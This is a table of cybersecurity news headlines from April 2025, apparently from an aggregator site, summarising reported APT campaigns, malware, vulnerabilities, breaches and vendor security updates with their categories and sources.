H January(270) February(364) March(400) April(276) May(343) June(373) July(336) August(388) September(287) October(57) November(67) December(107) 2025 January(178) February(102) March(349) April(193) May(0) June(0) July(0) August(0) September(0)
DATE |
NAME | Info |
CATEG. |
WEB |
| 24.4.25 | Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware | At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole . | APT | The Hacker News |
| 24.4.25 | Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools | Cybersecurity researchers have demonstrated a proof-of-concept (PoC) rootkit dubbed Curing that leverages a Linux asynchronous I/O mechanism called io_uring | Virus | The Hacker News |
| 24.4.25 | Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals | The threat actors behind the Darcula phishing-as-a-service ( PhaaS ) platform have released new updates to their cybercrime suite with generative artificial intelligence | AI | The Hacker News |
| 24.4.25 | Critical Commvault Command Center Flaw Enables Attackers to Execute Code Remotely | A critical security flaw has been disclosed in the Commvault Command Center that could allow arbitrary code execution on affected installations. The vulnerability, | Vulnerebility | The Hacker News |
| 24.4.25 | WhatsApp Adds Advanced Chat Privacy to Blocks Chat Exports and Auto-Downloads | WhatsApp has introduced an extra layer of privacy called Advanced Chat Privacy that allows users to block participants from sharing the contents of a conversation | Social | The Hacker News |
| 24.4.25 | DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack | Multiple threat activity clusters with ties to North Korea (aka Democratic People's Republic of Korea or DPRK) have been linked to attacks targeting organizations and | APT | The Hacker News |
| 23.4.25 | Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign | The Iran-nexus threat actor known as UNC2428 has been observed delivering a backdoor known as MURKYTOUR as part of a job-themed social engineering | APT | The Hacker News |
| 23.4.25 | Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices | Cybersecurity researchers have revealed that Russian military personnel are the target of a new malicious campaign that distributes Android spyware under the | Virus | The Hacker News |
| 23.4.25 | Russian Hackers Exploit Microsoft OAuth to Target Ukraine Allies via Signal and WhatsApp | Multiple suspected Russia-linked threat actors are "aggressively" targeting individuals and organizations with ties to Ukraine and human rights with an aim to | Exploit | The Hacker News |
| 23.4.25 | Ripple's xrpl.js npm Package Backdoored to Steal Private Keys in Major Supply Chain Attack | The Ripple cryptocurrency npm JavaScript library named xrpl.js has been compromised by unknown threat actors as part of a software supply chain attack | Hack | The Hacker News |
| 23.4.25 | Google Drops Cookie Prompt in Chrome, Adds IP Protection to Incognito | Google on Tuesday revealed that it will no longer offer a standalone prompt for third-party cookies in its Chrome browser as part of its Privacy Sandbox initiative. | Security | The Hacker News |
| 23.4.25 | Docker Malware Exploits Teneo Web3 Node to Earn Crypto via Fake Heartbeat Signals | Cybersecurity researchers have detailed a malware campaign that's targeting Docker environments with a previously undocumented technique to mine | Exploit | The Hacker News |
| 22.4.25 | GCP Cloud Composer Bug Let Attackers Elevate Access via Malicious PyPI Packages | Cybersecurity researchers have detailed a now-patched vulnerability in Google Cloud Platform (GCP) that could have enabled an attacker to elevate their privileges | Vulnerebility | The Hacker News |
| 22.4.25 | Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials | In what has been described as an "extremely sophisticated phishing attack," threat actors have leveraged an uncommon approach that allowed bogus emails to be | Exploit | The Hacker News |
| 22.4.25 | Microsoft Secures MSA Signing with Azure Confidential VMs Following Storm-0558 Breach | Microsoft on Monday announced that it has moved the Microsoft Account (MSA) signing service to Azure confidential virtual machines (VMs) and that it's also in the process of migrating the Entra ID signing service as well. | APT | The Hacker News |
| 22.4.25 | Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware | The China-linked cyber espionage group tracked as Lotus Panda has been attributed to a campaign that compromised multiple organizations in an unnamed | APT | The Hacker News |
| 22.4.25 | Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan | Cybersecurity researchers have flagged a new malicious campaign related to the North Korean state-sponsored threat actor known as Kimsuky that exploits a now- | APT | The Hacker News |
| 22.4.25 | Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds | Everybody knows browser extensions are embedded into nearly every user's daily workflow, from spell checkers to GenAI tools. What most IT and security people | AI | The Hacker News |
| 22.4.25 | SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks | A new Android malware-as-a-service (MaaS) platform named SuperCard X can facilitate near-field communication ( NFC ) relay attacks, enabling cybercriminals to | Virus | The Hacker News |
| 22.4.25 | Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery | Cybersecurity researchers have disclosed a surge in "mass scanning, credential brute-forcing, and exploitation attempts" originating from IP addresses associated | APT | The Hacker News |
| 21.4.25 | Phishers abuse Google OAuth to spoof Google in DKIM replay attack | In a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google's systems, passing all verifications but pointing to a fraudulent page that collected logins. | Phishing | |
| 21.4.25 | State-sponsored hackers embrace ClickFix social engineering tactic | ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. | APT | |
| 21.4.25 | Widespread Microsoft Entra lockouts tied to new security feature rollout | Windows administrators from numerous organizations report widespread account lockouts triggered by false positives in the rollout of a new Microsoft Entra ID's "leaked credentials" detection app called MACE. | OS | BleepingComputer |
| 21.4.25 | New Android malware steals your credit cards for NFC relay attacks | A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. | Virus | BleepingComputer |
| 21.4.25 | Critical Erlang/OTP SSH RCE bug now has public exploits, patch now | Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. | Exploit | |
| 21.4.25 | Google Gemini AI is getting ChatGPT-like Scheduled Actions feature | Google Gemini is testing a ChatGPT-like scheduled tasks feature called "Scheduled Actions," which will allow you to create tasks that Gemini will execute later. | AI | BleepingComputer |
| 21.4.25 | Interlock ransomware gang pushes fake IT tools in ClickFix attacks | The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. | Ransom | |
| 21.4.25 | FBI: Scammers pose as FBI IC3 employees to 'help' recover lost funds | The FBI warns that scammers posing as FBI IC3 employees are offering to "help" fraud victims recover money lost to other scammers. | Spam | |
| 21.4.25 | ASUS warns of critical auth bypass flaw in routers using AiCloud | ASUS is warning about an authentication bypass vulnerability in routers with AiCloud enabled that could allow remote attackers to perform unauthorized execution of functions on the device. | Vulnerebility | |
| 21.4.25 | SonicWall SMA VPN devices targeted in attacks since January | A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf. | Vulnerebility | |
| 21.4.25 | Chinese hackers target Russian govt with upgraded RAT malware | Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware. | Virus | BleepingComputer |
| 21.4.25 | 7 Steps to Take After a Credential-Based cyberattack | Hackers don't break in—they log in. Credential-based attacks now fuel nearly half of all breaches. Learn how to scan your Active Directory for compromised passwords and stop attackers before they strike. | Cyber | BleepingComputer |
| 21.4.25 | Cisco Webex bug lets hackers gain code execution via meeting links | Cisco has released security updates for a high-severity Webex vulnerability that allows unauthenticated attackers to gain client-side remote code execution using malicious meeting invite links. | Vulnerebility | BleepingComputer |
| 21.4.25 | Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now | A critical vulnerability in the Erlang/OTP SSH, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices. | Exploit | |
| 21.4.25 | Entertainment services giant Legends International discloses data breach | Entertainment venue management firm Legends International warns it suffered a data breach in November 2024, which has impacted employees and people who visited venues under its management. | Incindent | BleepingComputer |
| 21.4.25 | Windows NTLM hash leak flaw exploited in phishing attacks on governments | A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. | Phishing | BleepingComputer |
| 21.4.25 | Chrome extensions with 6 million installs have hidden tracking code | A set of 57 Chrome extensions with 6,000,000 users have been discovered with very risky capabilities, such as monitoring browsing behavior, accessing cookies for domains, and potentially executing remote scripts. | Security | BleepingComputer |
| 21.4.25 | Ahold Delhaize confirms data theft after INC ransomware claims attack | Food retail giant Ahold Delhaize confirms that data was stolen from its U.S. business systems during a November 2024 cyberattack. | Ransom | BleepingComputer |
| 21.4.25 | APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures | The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with | APT | The Hacker News |
| 20.4.25 | CTM360 Tracks Global Surge in SMS-Based Reward and Toll Scams | Thousands tricked by fake reward & toll scam texts. CTM360 exposes PointyPhish & TollShark—SMS phishing campaigns powered by the Darcula PhaaS platform, with 5K+ domains stealing payment info worldwide. | Spam | |
| 20.4.25 | Microsoft: Office 2016 and Office 2019 reach end of support in October | Microsoft has reminded customers that Office 2016 and Office 2019 will reach the end of extended support six months from now, on October 14, 2025. | Security | BleepingComputer |
| 20.4.25 | CISA warns of increased breach risks following Oracle Cloud leak | On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks. | Incindent | |
| 20.4.25 | New Windows Server emergency updates fix container launch issue | Microsoft has released emergency Windows Server updates to address a known issue preventing Windows containers from launching. | Vulnerebility | |
| 20.4.25 | CISA tags SonicWall VPN flaw as actively exploited in attacks | On Wednesday, CISA warned federal agencies to secure their SonicWall Secure Mobile Access (SMA) 100 series appliances against attacks exploiting a high-severity remote code execution vulnerability. | Exploit | |
| 20.4.25 | Over 16,000 Fortinet devices compromised with symlink backdoor | Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices. | Virus | |
| 20.4.25 | Apple fixes two zero-days exploited in targeted iPhone attacks | Apple released emergency security updates to patch two zero-day vulnerabilities that were used in an "extremely sophisticated attack" against specific targets' iPhones. | Vulnerebility | BleepingComputer |
| 20.4.25 | Jira Down: Atlassian users experiencing degraded performance | Atlassian users are experiencing degraded performance amid an 'active incident' affecting multiple Jira products since morning hours today. Jira, Jira Service Management, Jira Work Management and Jira Product Discovery are among the impacted products. | Security | BleepingComputer |
| 20.4.25 | 41% of Attacks Bypass Defenses: Adversarial Exposure Validation Fixes That | Your dashboards say you're secure—but 41% of threats still get through. Picus Security's Adversarial Exposure Validation uncovers what your stack is missing with continuous attack simulations and automated pentesting. | Security | |
| 20.4.25 | CISA extends funding to ensure 'no lapse in critical CVE services' | CISA says the U.S. government has extended MITRE's funding to ensure no continuity issues with the critical Common Vulnerabilities and Exposures (CVE) program. | Security | BleepingComputer |
| 20.4.25 | Microsoft warns of blue screen crashes caused by April updates | Microsoft warned customers this week that their systems might crash with a blue screen error caused by a secure kernel fatal error after installing Windows updates released since March. | OS | BleepingComputer |
| 20.4.25 | Microsoft: Some devices offered Windows 11 upgrades despite Intune blocks | Microsoft is working to fix an ongoing issue causing some users' Windows devices to be offered Windows 11 upgrades despite Intune policies preventing them. | OS | BleepingComputer |
| 20.4.25 | MITRE warns that funding for critical CVE program expires today | MITRE Vice President Yosry Barsoum has warned that U.S. government funding for the Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE) programs expires today, which could lead to widespread disruption across the global cybersecurity industry. | Security | |
| 20.4.25 | Midnight Blizzard deploys new GrapeLoader malware in embassy phishing | Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies. | APT | |
| 20.4.25 | Landmark Admin data breach impact now reaches 1.6 million people | Landmark Admin has issued an update to its investigation of a cyberattack it suffered in May 2024, increasing the number of impacted individuals to 1.6 million. | Incindent | |
| 20.4.25 | Infamous message board 4chan taken down following major hack | 4chan, a notorious online forum, was taken offline earlier today after what appears to be a significant hack and has since been loading intermittently. | Hack | |
| 20.4.25 | Microsoft blocks ActiveX by default in Microsoft 365, Office 2024 | Microsoft announced it will begin disabling all ActiveX controls in Windows versions of Microsoft 365 and Office 2024 applications later this month. | OS | BleepingComputer |
| 20.4.25 | Microsoft: Exchange 2016 and 2019 reach end of support in six months | Microsoft warned that Exchange 2016 and Exchange 2019 will reach the end of support six months from now, on October 14. | OS | BleepingComputer |
| 20.4.25 | Google adds Android auto-reboot to block forensic data extractions | Google is rolling out a new security mechanism on Android devices that will automatically reboot locked, unused devices after three consecutive days of inactivity, restoring memory to an encrypted state. | OS | |
| 20.4.25 | Microsoft warns of CPU spikes when typing in classic Outlook | Microsoft warned Windows users of increased CPU usage when typing while using recent versions of the classic Outlook email client. | OS | BleepingComputer |
| 20.4.25 | Hertz confirms customer info, drivers' licenses stolen in data breach | Car rental giant Hertz Corporation warns it suffered a data breach after customer data for its Hertz, Thrifty, and Dollar brands was stolen in the Cleo zero-day data theft attacks. | Incindent | BleepingComputer |
| 20.4.25 | Govtech giant Conduent confirms client data stolen in January cyberattack | American business services giant and government contractor Conduent disclosed today that client data was stolen in a January 2025 cyberattack. | Incindent | BleepingComputer |
| 20.4.25 | Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems | Cybersecurity researchers have uncovered three malicious packages in the npm registry that masquerade as a popular Telegram bot library but harbor SSH | Virus | The Hacker News |
| 20.4.25 | Cybersecurity firm buying hacker forum accounts to spy on cybercriminals | Swiss cybersecurity firm Prodaft has launched a new initiative called 'Sell your Source' where the company purchases verified and aged accounts on hacking forums to to spy on cybercriminals. | Security | |
| 20.4.25 | SSL/TLS certificate lifespans reduced to 47 days by 2029 | The CA/Browser Forum has voted to significantly reduce the lifespan of SSL/TLS certificates over the next 4 years, with a final lifespan of just 47 days starting in 2029. | Security | BleepingComputer |
| 20.4.25 | New ResolverRAT malware targets pharma and healthcare orgs worldwide | A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. | Virus | |
| 20.4.25 | Meta to resume AI training on content shared by Europeans | Meta announced today that it will soon start training its artificial intelligence models using content shared by European adult users on its Facebook and Instagram social media platforms. | AI | |
| 20.4.25 | Kidney dialysis firm DaVita hit by weekend ransomware attack | Kidney dialysis firm DaVita disclosed Monday it suffered a weekend ransomware attack that encrypted parts of its network and impacted some of its operations. | Ransom | |
| 20.4.25 | Enhancing your DevSecOps with Wazuh, the open source XDR platform | Security shouldn't wait until the end of development. Wazuh brings real-time threat detection, compliance, and vulnerability scanning into your DevOps pipeline—powering a stronger DevSecOps strategy from day one. Learn more about how Wazuh can help secure your development cycle. | Security | |
| 20.4.25 | Microsoft tells Windows users to ignore 0x80070643 WinRE errors | Microsoft says some users might see 0x80070643 installation failures when trying to deploy the April 2025 Windows Recovery Environment (WinRE) updates. | OS | BleepingComputer |
| 20.4.25 | Microsoft: New Windows updates fix Active Directory policy issues | Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy. | OS | BleepingComputer |
| 20.4.25 | OpenAI's GPT-4.1, 4.1 nano, and 4.1 mini models release imminent | According to references spotted on OpenAI's website, the Microsoft-backed AI startup is planning to launch five new models this week, including GPT-4.1, 4.1 nano, and 4.1 mini. | AI | |
| 20.4.25 | Microsoft: Windows Server 2025 restarts break connectivity on some DCs | Microsoft warned IT admins that some Windows Server 2025 domain controllers might become inaccessible after a restart, causing apps and services to fail or remain unreachable. | OS | BleepingComputer |
| 20.4.25 | Chrome 136 fixes 20-year browser history privacy risk | Google is fixing a long-standing privacy issue that, for years, enabled websites to determine users' browsing history through the previously visited links. | Vulnerebility | BleepingComputer |
| 19.4.25 | We discovered China-nexus threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers. | APT blog | Google Threat Intelligence | |
| 19.4.25 | Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger | Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. | Social blog | Google Threat Intelligence |
| 19.4.25 | Cyber Attack Surge: In Q1 2025, cyber attacks per organization increased by 47%, reaching an ... | Cyber blog | Checkpoint | |
| 19.4.25 | Executive Summary Check Point Research has been observing a sophisticated phishing campaign conducted by Advanced ... | APT blog | Checkpoint | |
| 19.4.25 | Hacktivists Target Critical Infrastructure, Move Into Ransomware | Hacktivists are increasingly adopting more sophisticated - and destructive - attack types. | Ransom blog | Cyble |
| 19.4.25 | DOGE "Big Balls" Ransomware and the False Connection to Edward Coristine | Cyble investigates the DOGE BIG BALLS Ransomware, analyzing its operation and the false ties made to... | Ransom blog | Cyble |
| 19.4.25 | APT PROFILE – EARTH ESTRIES | Earth Estries is a Chinese Advanced Persistent Threat (APT) group that has gained prominence for its sophisticated cyber espionage activities targeting critical infrastructure and | APT blog | Cyfirma |
| 19.4.25 | Fortnightly Vulnerability Summary | Fortnightly Vulnerability Summary CHECK OUT THESE FAST FACTS ON FORTNIGHTLY OBSERVED VULNERABILITIES. Fortnight's Most Impacted Products Linux | ColdFusion | FrameMaker | Vulnerebility blog | Cyfirma |
| 19.4.25 | Cyber Espionage Among Allies: Strategic Posturing in an Era of Trade Tensions | Executive Summary In the past decade, a pattern of cyber operations and espionage between the United States and its allies has emerged, complicating relationships traditionally | APT blog | Cyfirma |
| 19.4.25 | SCAMONOMICS THE DARK SIDE OF STOCK & CRYPTO INVESTMENTS IN INDIA | EXECUTIVE SUMMARY At CYFIRMA, we are committed to offering up-to-date insights into prevalent threats and tactics employed by malicious actors targeting both organizations | Cryptocurrency blog | Cyfirma |
| 19.4.25 | The Top Firmware and Hardware Attack Vectors | As firmware-level threats continue to gain popularity in the wild, security teams need to understand how these threats work and the real-world risks they pose to an organization’s security. | Attack blog | Eclypsium |
| 19.4.25 | Revolutionizing Your SOC: Welcome to Threat Protection Workbench | Email remains the number one threat vector in today’s cyber landscape, responsible for more than 90% of successful cyberattacks. As the volume and sophistication of email threats grow, security operations center (SOC) teams are under constant pressure to investigate and respond to incidents more quickly. Even with strong detection, the sheer number of alerts and investigation steps can slow down response times and strain already limited resources—leading to fatigue and increasing the risk of missed threats. | Security blog | PROOFPOINT |
| 19.4.25 | Around the World in 90 Days: State-Sponsored Actors Try ClickFix | While primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored actors in multiple campaigns using the ClickFix social engineering technique for the first time. | Malware blog | PROOFPOINT |
| 19.4.25 | The Expanding Attack Surface: Ways That Attackers Compromise Trusted Business Communications | The modern workplace has expanded beyond email. Attackers now exploit collaboration tools, supplier relationships and human trust to bypass defenses and compromise accounts. This five-part blog series raises awareness around these shifting attack tactics. And it introduces our holistic approach to protecting users. | Attack blog | PROOFPOINT |
| 19.4.25 | Cybersecurity Stop of the Month: Bitcoin Scam—How Cybercriminals Lure Victims with Free Crypto to Steal Credentials and Funds | In recent years, cryptocurrency has grown from a niche interest into a mainstream financial ecosystem. This evolution, however, hasn’t been without drawbacks. Namely, it has attracted cybercriminals who use the allure of digital wealth to perpetrate sophisticated fraud schemes. In 2023, illicit crypto addresses received at least $46.1 billion, up from $24.2 billion. This underscores how rapidly crypto-related crimes are spreading. | Cryptocurrency blog | PROOFPOINT |
| 19.4.25 | Threat actors misuse Node.js to deliver malware and other malicious payloads | Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration. | Malware blog | Microsoft blog |
| 19.4.25 | ZDI-23-1527 and ZDI-23-1528: The Potential Impact of Overly Permissive SAS Tokens on PC Manager Supply Chains | In ZDI-23-1527 and ZDI-23-1528 we uncover two possible scenarios where attackers could have compromised the Microsoft PC Manager supply chain. | Vulnerebility blog | Trend Micro |
| 19.4.25 | BPFDoor’s Hidden Controller Used Against Asia, Middle East Targets | A controller linked to BPF backdoor can open a reverse shell, enabling deeper infiltration into compromised networks. Recent attacks have been observed targeting the telecommunications, finance, and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. | Malware blog | Trend Micro |
| 19.4.25 | Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks | A previously disclosed vulnerability in NVIDIA Container Toolkit has an incomplete patch, which, if exploited, could put a wide range of AI infrastructure and sensitive data at risk. | Vulnerebility blog | Trend Micro |
| 19.4.25 | Top 10 for LLM & Gen AI Project Ranked by OWASP | Trend Micro has become a Gold sponsor of the OWASP Top 10 for LLM and Gen AI Project, merging cybersecurity expertise with OWASP's collaborative efforts to address emerging AI security risks. This partnership underscores Trend Micro's unwavering commitment to advancing AI security, ensuring a secure foundation for the transformative power of AI. | AI blog | Trend Micro |
| 19.4.25 | CrazyHunter Campaign Targets Taiwanese Critical Sectors | This blog entry details research on emerging ransomware group CrazyHunter, which has launched a sophisticated campaign aimed at Taiwan's essential services. | Ransom blog | Trend Micro |
| 19.4.25 | Nova RaaS: The Ransomware That ‘Spares’ Schools and Nonprofits—For Now | A new ransomware group calling themselves Nova RaaS, or ransomware-as-a-service, has been active for the past month distributing RaLord ransomware. On their blog, they claim to have no affiliations with other cybercriminal groups—and, in a surprising twist, say they’ve pledged not to target schools or nonprofit organizations. | Ransom blog | SonicWall |
| 19.4.25 | CVE-2025-29927: Next.js Middleware Can Be Bypassed with Crafted Header | The SonicWall Capture Labs threat research team became aware of an authorization bypass vulnerability in Next.js, assessed its impact, and developed mitigation measures. Next.js is a react framework designed to simplify building web applications, focusing on performance, SEO, and ease of use. It provides features like server-side rendering (SSR), static site generation (SSG), and automatic code splitting, making it a popular choice for building fast and scalable web applications. | Vulnerebility blog | SonicWall |
| 19.4.25 | Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis | In December 2024, we uncovered an attack chain that employs distinct, multi-layered stages to deliver malware like Agent Tesla variants, Remcos RAT or XLoader. Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution. The phishing campaign we analyzed used deceptive emails posing as an order release request to deliver a malicious attachment. | Malware blog | Palo Alto |
| 19.4.25 | Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware | Slow Pisces (aka Jade Sleet, TraderTraitor, PUKCHONG) is a North Korean state-sponsored threat group primarily focused on generating revenue for the DPRK regime, typically by targeting large organizations in the cryptocurrency sector. This article analyzes their campaign that we believe is connected to recent cryptocurrency heists. | APT blog | Palo Alto |
| 19.4.25 | CVE-2025-24054, NTLM Exploit in the Wild | CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors already had over a week to develop and deploy exploits before the vulnerability began to be actively abused. | Vulnerebility blog | Checkpoint |
| 19.4.25 | Renewed APT29 Phishing Campaign Against European Diplomats | Check Point Research has been tracking an advanced phishing campaign conducted by APT29, a Russia linked threat group, which is targeting diplomatic entities across Europe. | APT blog | Checkpoint |
| 19.4.25 | Waiting Thread Hijacking: A Stealthier Version of Thread Execution Hijacking | Process Injection is one of the important techniques in the attackers’ toolkit. In the constant cat-and-mouse game, attackers try to invent its new implementations that bypass defenses, using creative methods and lesser-known APIs. | Hacking blog | Checkpoint |
| 19.4.25 | Care what you share | In this week’s newsletter, Thorsten muses on how search engines and AI quietly gather your data while trying to influence your buying choices. Explore privacy-friendly alternatives and get the scoop on why it's important to question the platforms you interact with online. | AI blog | Palo Alto |
| 19.4.25 | Unmasking the new XorDDoS controller and infrastructure | Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks. | Malware blog | Palo Alto |
| 19.4.25 | Year in Review: The biggest trends in ransomware | This week, our Year in Review spotlight is on ransomware—where low-profile tactics led to high-impact consequences. Download our 2 page ransomware summary, or watch our 55 second video. | Ransom blog | Palo Alto |
| 19.4.25 | Eclipse and STMicroelectronics vulnerabilities | Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities found in Eclipse ThreadX and four vulnerabilities in STMicroelectronics. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adh | Vulnerebility blog | Palo Alto |
| 19.4.25 | CapCut copycats are on the prowl | Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead | AI blog | Eset |
| 19.4.25 | They’re coming for your data: What are infostealers and how do I stay safe? | Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data | Cyber blog | |
| 19.4.25 | Attacks on the education sector are surging: How can cyber-defenders respond? | Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk? | Attack blog | |
| 19.4.25 | From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets | This article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer". | Malware blog | Cybereason |
| 19.4.25 | The Windows Registry Adventure #6: Kernel-mode objects | Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses | Cyber blog | Project Zero |
| 19.4.25 | Closing the Security Gap From Threat Hunting to Detection Engineering | Learn how to use existing tooling to perform threat hunting and detection engineering to find hidden threats and strengthen your defenses. | Cyber blog | Trelix |
| 19.4.25 | ASUS Confirms Critical Flaw in AiCloud Routers; Users Urged to Update Firmware | ASUS has disclosed a critical security flaw impacting routers with AiCloud enabled that could permit remote attackers to perform unauthorized execution of functions | Vulnerebility | The Hacker News |
| 19.4.25 | Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States | Cybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft | Phishing | The Hacker News |
| 18.4.25 | Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader | A new multi-stage attack has been observed delivering malware families like Agent Tesla variants, Remcos RAT, and XLoader. "Attackers increasingly rely on such | Virus | The Hacker News |
| 18.4.25 | Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT | Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS , with 71.3 percent of the | Virus | The Hacker News |
| 18.4.25 | CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a medium-severity security flaw impacting Microsoft Windows to its Known | Vulnerebility | The Hacker News |
| 18.4.25 | Mustang Panda Targets Myanmar With StarProxy, EDR Bypass, and TONESHELL Updates | The China-linked threat actor known as Mustang Panda has been attributed to a cyber attack targeting an unspecified organization in Myanmar with previously | APT | The Hacker News |
| 17.4.25 | State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns | Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to | Virus | The Hacker News |
| 17.4.25 | Critical Erlang/OTP SSH Vulnerability (CVSS 10.0) Allows Unauthenticated Code Execution | A critical security vulnerability has been disclosed in the Erlang/Open Telecom Platform (OTP) SSH implementation that could permit an attacker to execute arbitrary code sans any authentication under certain conditions. | Vulnerebility | The Hacker News |
| 17.4.25 | Node.js Malware Campaign Targets Crypto Users with Fake Binance and TradingView Installers | Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data | Virus | The Hacker News |
| 17.4.25 | CISA Flags Actively Exploited Vulnerability in SonicWall SMA Devices | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting SonicWall Secure Mobile Access ( SMA ) 100 | Exploit | The Hacker News |
| 17.4.25 | Apple Patches Two Actively Exploited iOS Flaws Used in Sophisticated Targeted Attacks | Apple on Wednesday released security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two security flaws that it said have come under | Exploit | The Hacker News |
| 17.4.25 | New Windows Task Scheduler Bugs Let Attackers Bypass UAC and Tamper with Logs | Cybersecurity researchers have detailed four different vulnerabilities in a core component of the Windows task scheduling service that could be exploited by local | Attack | The Hacker News |
| 17.4.25 | Google Blocked 5.1B Harmful Ads and Suspended 39.2M Advertiser Accounts in 2024 | Google on Wednesday revealed that it suspended over 39.2 million advertiser accounts in 2024, with a majority of them identified and blocked by its systems | Cyber | The Hacker News |
| 16.4.25 | Gamma AI Platform Abused in Phishing Chain to Spoof Microsoft SharePoint Logins | Threat actors are leveraging an artificial intelligence (AI) powered presentation platform named Gamma in phishing attacks to direct unsuspecting users to | AI | The Hacker News |
| 16.4.25 | New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks | Cybersecurity researchers have unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting | Virus | The Hacker News |
| 16.4.25 | Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users | Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and | Cryptocurrency | The Hacker News |
